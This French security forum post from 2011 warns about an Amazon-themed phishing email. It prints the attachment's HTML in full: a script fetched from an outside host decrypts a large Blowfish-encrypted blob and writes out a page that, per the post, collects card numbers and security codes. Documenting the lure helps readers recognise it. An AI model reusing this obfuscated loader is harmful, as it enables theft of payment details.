Security-X

Forum Security-X => Sécurité Générale => Discussion démarrée par: igor51 le décembre 11, 2011, 14:22:37

Titre: [Phishing] Amazon
Posté par: igor51 le décembre 11, 2011, 14:22:37
Exemple de phishing : Amazon

Ce phishing nous a été rapporté par JPL (http://forums.futura-sciences.com/members/1676-jpl.html),modérateur et rédacteur sur Futura-Sciences.com

Il a reçu par mail, en pièce jointe un fichier html contenant le code suivant.

<html><head><script src='http://html-encrypter.googlecode.com/svn/trunk/hea1.js'></script><script>var hea1p = new Blowfish('0123456789?@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz');var hea1t = hea1p.decrypt('B0815FCE59B19D1681421203D42305530A91E6DAEC27A1663451DABA48ED7BAE804A0D5F077FDDBC398A9F2059EB1C876D788A10DE13E3650348DF9D99F983E6FFBE5522888209249262E141752384A5039867EB35E7DFAA6CC872BF767AD4AD98D58111D7A7ADD48D2A9ED92BDFF2808A01746DA8CA4941329A9FA8EA7CF8166A8C3741A3194F7FC65AA04DAE244BDE19AED8ECED1411472439109AB89982D081BEE1C78B032226D1634C8C97D8E6AFC672CC5F91F14897BB463DA36170A61E60B2B93ABD3C1F2558D2F5043CAF137CAF0CCE337710A37586F820C8692CFB06A27212BEF5EEC708CE3B757174D03D5E61D1999E45C775EAD9048AC3877EA49CFA04B29E1015A039BBCD69E4ADE640B4A901D82C893327F3DEDC2E0BA8B6C436C821C8999583A15FE1BED4CB3B2706B70099DE97832AA3E54B3AF386FD6D7112BDE33E48AB58D070B3C88B3CABECC41B5EE244E5A7ADF0ADF7401F9724B14F6907D4D1E90544548E76C9AD082F36EBFE407CF6820023F3E5BE1A42A36EEFE4526DE520EE23501AA633704EEB3CBBCE97F866B866F9E74F5D0468AC021336190F5F5563B9F3F56CE8C1E39D138D08103799F856E091783DDF0E2211E3AA7BEBAD2D4421BAF6C591D00923354EB598DEA343865E88EF69962615E20AEB39BD44BD76C9AD082F36EBFE407CF6820023F3E53FE699A7911DAA489070C7AD004558E2D0D2586CC9420699CF6970E7CDA662376B04A0AE59EEDA9B3D683387B99156B5A2E8CCDDFF1EBC3C582226C97D32E10F6A5688519A712D814C2DFDD0937A4D12FCC323F8BDD66495AB26EC97B285581104EEFAE0A6370D1362EA92DDF399478FDE2461E18D01D9F23FE699A7911DAA48A2E8CCDDFF1EBC3C582226C97D32E10F334D0BD38C894086E2F8045BD3A77A67A64A050FD0598A9812F866E6BCA5C322CABB148D8AA19B4C44622663B3E4C84C2D4421BAF6C591D00923354EB598DEA343865E88EF699626940B8A2D827AA743AC4BAF347BB83F523215C65A145282E9FC3BE0615A170A1AE024657EBF188E7736975A39A529B1DAC362E764267C16F57ABE8AEB8C6BA69E30AF930E9C928E03CB018C62BC90A7E7DFBFA791C673B0412DAA00120C8EC14DEECBD2CD15AC81ACC98434DD43B1EBE96DCD4C4ADD34CD98939BA9A0678E377074F556D4E9EC80D728CC585DD95ED94E3C0E13F29588EA382787174CB87196A9C0DBEEEA90600A40D2FA377026A0FC6C1F36BF08D2C787D0B380FEE16C760C1E5DB00548A9AB14D4BE400682AC62A73B70989164F3DEF0BE3A2A40CA66801E5C6F82471D39A1047D2D974F13FFB4890F77050A98C0CD2A183C3E90F09ED1BE79C9F9D420A335FE6A9F78335ED300026E9775D8B1877D263C3C34CCC8AE768E6CAB624AED8430A7B50CA6EC6E08C06A7F58809B31588165481BAFF1CC2082997885F9F3D5B110E20F883A3ECE2C448B18227A3107AB895A457B561E21C38A33864E3D63D9D1E3C4525A04020672E20355A70E7642F476E93FDCD0C99789A04E16175BA57A9A90F21AFCEFEF4A0E0D1F7B811493481043F0E9ADF08C090CFDF1967B193F6DB8EF7F1CF0FC9667813C8AE374462F4FFCFBD013326A879DF033371547D545B5B9646028FB5C7C3C9DB45337EEFBCB2CDA6FCE765E26DFF90D1C24B7FBE0F04F8E84E4EFD2C9858A4EE94E272B850FBE02644B035DD3D213D64E933AC0CD363D189F67F39BDC1B40E36B4729A282B49067A57B4806B12B7DC554F44328D1297736A4858FE4947E495EDBEE50949442301D24F19E03D3466AD01AF49EB2FA0448DFDD396A106DEA3B4E49A1D232B6F7FFF554BAB914103C14492C7877F7F4BCC5279FA9D112A0AC22AC0758E4649068E93A9C61B3D52FDB356A6F6080A792DA23770E67197594FF42B180BD7C08AABC11283713A67646E638E1B45E33CEB99561008E3DF1A5BFD06C110199EB4D281A6CA6B592D790FB9C3EFF059990EA065F9986737FD9152A8F60E654A67CD69CFD5A89A5D26B2E991D5AFF6BE926C7EE75BBF0FFF9939FD9F7458C0E23A5D763DD5CC4BE57479688561DA0F5C559806E56B8E19AF6729E0EE2D5DD5DED518EE3626EA56F790F7A547EF79CF836F7FC26FF85494FF756585C4DA00D05A5B79549A2C045F503AD895F25EB9D2A391FAA0CB593651505591D6B9302ECFECF12F3A3BFE080B12B85FB181ABA91CB8E53EA6E9F4A23810BC594BC312274EDF93ABEE360A85481830838A573B224ED749CB6378719D7FDBF001A47A3264B4755C21658AF2498395EA02891CD9FDDDA7E6896D17A97D1AEB60AD053D073D1D1AFFE7CFB7860B888FED5EB89CE4CA16A5FEA6AD02E42BFC46FECEAD4D7FFBE51C3E443A8B0788AC68882298C63CDD514C4A57BB5EE17AF542771A2DD4A75FA86D79FFE20DB9617DCB9C24B5676AE4729501C73DB500484FFC5FCA31590B5F9F42055DC4D1E0DF659591026B9E3D3377F436C04C4406079535BBE9F7D9BE23A4A4C80466E0D021EF5103A02EE235DF19ED9F7F0782517AEB2728ED9B8EAFFA6B660044C1FD44A78B7F1D197400521A2656036815D3C70FEB1015C3887D1718186E2781D67101B29F0AE662C004A4CF03C8B6659F4844DB1271C30965D8DA7274D05984889A8B6F7F345CAA31590B5F9F420555A6D5A225F11A3D1DAB1171970D3C072F3A3BFE080B12B85FB181ABA91CB8E53EA6E9F4A23810BC594BC312274EDF93ABEE360A85481830838A573B224ED749C2AC225670748CFCA30A0123EC902986D346629C7261ED8C31FD6E9F87935BED82C1046587101363BDF1A8143BD859C2FCE4AE6DECBAFB465116754E39EFE103E233EA5D2C25158E694F8949E2716E26C749BAC5F3EC69217EE7428397D2591DDF3A3BFE080B12B85AD7F1954BDF97C35BA064CB72768A0C713AD4652DDDB579B4765E880CC33FED908AABC11283713A6842892F86C3157C552E05000145AFD4DCA0131F8582EFB936C173FCA2D55F0C470C0D29E2C2C439DC1A5558A7B054815844468AB0FE43A6BC9691B1A0B064B0C74AA76E5520DF5149FB7B9E02C1B56D191320CEDFDA47F042B893A998F23A74DF8AAE7FD9ED1341BF533DE14FDDD27A34F592C68DF8B5ACF45E1CB74609E3ED07089B4D33D26694811B7D4762980AA764A1A34916F4D217A2FEC51E4791429151B2E744F98DF881350E1EC144BE89CA9DC47B1474B97A94C6A828BC4D592C27CE20AFF2F322A803143D797E1BEB54EDAC28AED7D3B43607560ADCC313B4CD747B9468EFC424161D446FD43CECD3BCC6EB90B71C564CE7CB4346629C7261ED8C31FD6E9F87935BED82C1046587101363BDF1A8143BD859C2FCE4AE6DECBAFB465116754E39EFE103E233EA5D2C25158E694F8949E2716E26C749BAC5F3EC69217EE7428397D2591DDF3A3BFE080B12B85AD7F1954BDF97C3556FC0A70B8840775C0E968FA27BA44B7BB9F740FBD7209A14765E880CC33FED908AABC11283713A6842892F86C3157C552E05000145AFD4DCA0131F8582EFB936C173FCA2D55F0C470C0D29E2C2C439DBE32CFEC952C53446C4C21F8FF473AE4CD518698BF2A0869CDFA81342545BE36C85222463B4F1F6ECE246A88DF6B0D689328FA48064D4F276ADAA9F656B73685CF1EE3168BEE580C23CE69E66AF9BA207E51ED661FF572034559532E0157D45D08AABC11283713A6694C2EC80B73793D0A5FC1FBEBBC78A84765E880CC33FED908AABC11283713A6842892F86C3157C552E05000145AFD4DCA0131F8582EFB936C173FCA2D55F0C470C0D29E2C2C439DD094CF0E8A86FC246C4C21F8FF473AE4CD518698BF2A0869CDFA81342545BE36C85222463B4F1F6ECE246A88DF6B0D689328FA48064D4F276ADAA9F656B73685CF1EE3168BEE580C23CE69E66AF9BA207E51ED661FF572034559532E0157D45D08AABC11283713A6694C2EC80B73793D244A104D395885556E3B220AA422F4126A828BC4D592C27CE20AFF2F322A803143D797E1BEB54EDAC28AED7D3B43607560ADCC313B4CD747B9468EFC424161D4AF97616893E311EDFD0A7442CC93D8A31658AF2498395EA02891CD9FDDDA7E6896D17A97D1AEB60AD053D073D1D1AFFE7CFB7860B888FED5EB89CE4CA16A5FEA6AD02E42BFC46FECEAD4D7FFBE51C3E443A8B0788AC68882AC3EEF59FE6E5101AFDC5E1187F2622878D62E153C7282420ED1ABADF6F6F016AFDFCCECE0D2B573782B6182174E895C8CD71FD119DD1E00665959BC0572141AEDFE28B895EA889CD2C887724DD98B2FF471F78AD3233AE1981A2937197AB664EC80A258AADFDC3DD5ECDBDD49C1FBAAFE92815988ABE843D88D8C60E50A40AA957780D91AC90F53DF07506A8E754ABCEF7F7363E2831142688E6DE6FDBB552A9C33C28CC5BEAD72F2AEA0BD3DD4954409C9121934BDFDB6E9B5E5E4A19E3AB29552BA5036B33687824C211E12589F491A8280CB0E59026FA68C1C3FC38E09A5828C385BCCC37AAF8C3D47246A2B757E7167288ED9B5C5CDDA03DF6DBA5CE1D46171D562F4834C1F19B8D2F229D428718DDD50FC4DF9A0D6FB209AB529D1EE571C9963A3DAB8647291B82D193A859A1CBB0349177E7E6DDDED45E926D9BDCA632FDCC6B37373EC16DBB9FC444ED9D144FB4B4241D3743E6AF275FA2A42C3BCBAA5D03CBCF715CD9DE6177EE93BFA4557CCAD937B5F5F7A81B2C40FA138CA002A5B577220B1996BECE6A544662FA8A74873EA3300810E35707887FF18E0EC37B5359AC017A7F2A7461D10B816BDF423D52C3A8A39B46057D7F222A531E6585EDAD8030C471212A88FC7B4F538D33A658E6E46CFFD3A0D3F82352D47636FBF45D7573DAEEBEDD3152C2889369945BB50E6FA582B763302368F981A2937197AB664EEAB49DA67B66E7F2C3299831DE3C069EF53ED9D663DC452A9A1F72EB343E3E0829A1ABEC3AB242C573DAEEBEDD3152C521FAE8C6A3C0B52C5A6F57426D4822CC4F0DAD6E2C917D5F76E7D25CF47B966');document.write(hea1t)</script></head></html>
Une fois déchiffrée, voici le résultat. Nous avons décidé de montrer le résultat pour illustrer nos propos.

(https://forum.security-x.fr/proxy.php?request=http%3A%2F%2Fsecurity-x.fr%2Fimg%2Fpublic%2Fphishing.jpg&hash=fda49cd99bf1d7f76af2903921cecca904db9d2a)

Une description technique : http://www.spywareremove.com/removetrojphishaz.html

Une rapide analyse sur VirusTotal ne renvoie que peu de résultat : http://www.virustotal.com/file-scan/report.html?id=4fd99cdd03453a637cb02ac96b781cf2b479785d0aa2ffbd90ca928514969577-1323201894

Comme on peut le voir sur l'image, la page propose de renseigner tout un tas d'informations dont votre numéro de carte ainsi que son code de sécurité.

Ni une banque, ni un site d'e-commerce ne vous demanderont jamais ces informations par mails.

Faites attention aux informations qui vous sont demandées !